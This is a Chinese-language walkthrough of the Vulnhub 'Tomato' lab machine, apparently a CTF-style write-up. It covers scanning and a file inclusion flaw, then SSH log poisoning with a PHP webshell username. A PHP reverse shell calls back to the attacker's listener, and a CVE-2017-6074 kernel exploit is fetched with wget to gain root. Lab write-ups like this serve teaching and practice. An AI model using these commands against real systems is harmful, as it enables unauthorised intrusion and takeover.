Vulnhub系列：Tomato（文件包含getshell）

这个靶机挺有意思，它是通过文件包含漏洞进行的getshell，主要姿势是将含有一句话木马的内容记录到ssh的登录日志中，然后利用文件包含漏洞进行包含，从而拿到shell

0x01 靶机信息

靶机:Tomato

难度:中—难

下载:https://www.vulnhub.com/entry/tomato-1,557/

靶机描述：

0x02 信息收集

nmap扫描存活主机确定靶场ip

nmap -sP 192.168.43.0/24

接下来扫描靶机的端口

nmap -sS -sV -p- -v 192.168.43.165

0x03 漏洞发现

然后访问web服务

网站目录扫描

dirb http://192.168.43.165:80

访问antibot_image发现存在目录遍历

发现info.php是phpinfo的界面

查看页面源代码发现一串文件包含的代码

http://192.168.43.165/antibot_image/antibots/info.php?image=/etc/passwd

0x04 漏洞利用

接下来尝试文件包含被污染的SSH日志来getshell

ssh '<?php system($_GET['shell']); ?>'@192.168.43.165 -p2211

这样'<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去

ssh日志在/var/log/auth.log中

开启nc监听

nc -lvnp 3388

反弹shell   将

http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'

其中以下语句是建立socket会话，然后反向连接

php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'

然后进行url编码

http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.43.221%22%2c3388)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

访问URL，成功反弹shell

0x05 权限提升

我们首先建立可交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

然后查看linux内核版本

uname -a

去github上去找这个版本的exp

https://github.com/kkamagui/linux-kernel-exploits

用这个CVE-2017-6074的

、

下载到本地

git clone https://github.com/kkamagui/linux-kernel-exploits.git

然后运行compile.sh 编译c文件

并上传到目标主机

python -m SimpleHTTPServer 8000

然后用wget下载到靶机上

wget http://192.168.43.221:8000/CVE-2017-6074

查看该文件的权限

ls -l

赋予执行权限

chmod +x CVE-2017-6074

运行该文件

发现已经拿到root权限

参考：https://mp.weixin.qq.com/s/40zG1Tjmo_8pbbpN-IWZ4A